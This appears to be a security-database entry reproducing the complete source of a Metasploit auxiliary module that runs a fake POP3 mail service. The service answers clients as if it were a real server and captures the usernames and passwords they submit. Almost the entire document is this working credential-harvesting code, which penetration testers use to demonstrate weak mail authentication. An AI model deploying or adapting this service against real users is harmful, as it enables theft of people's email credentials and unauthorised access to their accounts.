Authentication Capture: POP3

2008-03-02T04:46:13
ID MSF:AUXILIARY/SERVER/CAPTURE/POP3
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module provides a fake POP3 service that is designed to capture authentication credentials.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::TcpServer
  include Msf::Auxiliary::Report


  def initialize
    super(
      'Name'        => 'Authentication Capture: POP3',
      'Description'    => %q{
        This module provides a fake POP3 service that
      is designed to capture authentication credentials.
      },
      'Author'      => ['ddz', 'hdm'],
      'License'     => MSF_LICENSE,
      'Actions'     =>
        [
          [ 'Capture' ]
        ],
      'PassiveActions' =>
        [
          'Capture'
        ],
      'DefaultAction'  => 'Capture'
    )

    register_options(
      [
        OptPort.new('SRVPORT',    [ true, "The local port to listen on.", 110 ])
      ])
  end

  def setup
    super
    @state = {}
  end

  def run
    @myhost = datastore['SRVHOST']
    @myport = datastore['SRVPORT']
    print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
    exploit()
  end

  def on_client_connect(c)
    @state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil}
    c.put "+OK\r\n"
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def on_client_data(c)
    data = c.get_once
    return if not data
    cmd,arg = data.strip.split(/\s+/, 2)
    arg ||= ""

    if(cmd.upcase == "USER")
      @state[c][:user] = arg
      c.put "+OK\r\n"
      return
    end

    if(cmd.upcase == "PASS")
      @state[c][:pass] = arg

      report_cred(
        ip: @state[c][:ip],
        port: @myport,
        service_name: 'pop3',
        user: @state[c][:user],
        password: @state[c][:pass],
        proof: arg
      )
      print_good("POP3 LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
      @state[c][:pass] = data.strip
      c.put "+OK\r\n"
      return
    end

    if(cmd.upcase == "STAT")
      c.put "+OK 0 0\r\n"
      return
    end

    if(cmd.upcase == "CAPA")
      c.put "-ERR No Extended Capabilities\r\n"
      return
    end

    if(cmd.upcase == "LIST")
      c.put "+OK 0 Messages\r\n"
      return
    end

    if(cmd.upcase == "QUIT" || cmd.upcase == "RSET" || cmd.upcase == "DELE")
      c.put "+OK\r\n"
      return
    end

    print_status("POP3 UNKNOWN CMD #{@state[c][:name]} \"#{data.strip}\"")
    c.put "+OK\r\n"
  end

  def on_client_close(c)
    @state.delete(c)
  end


end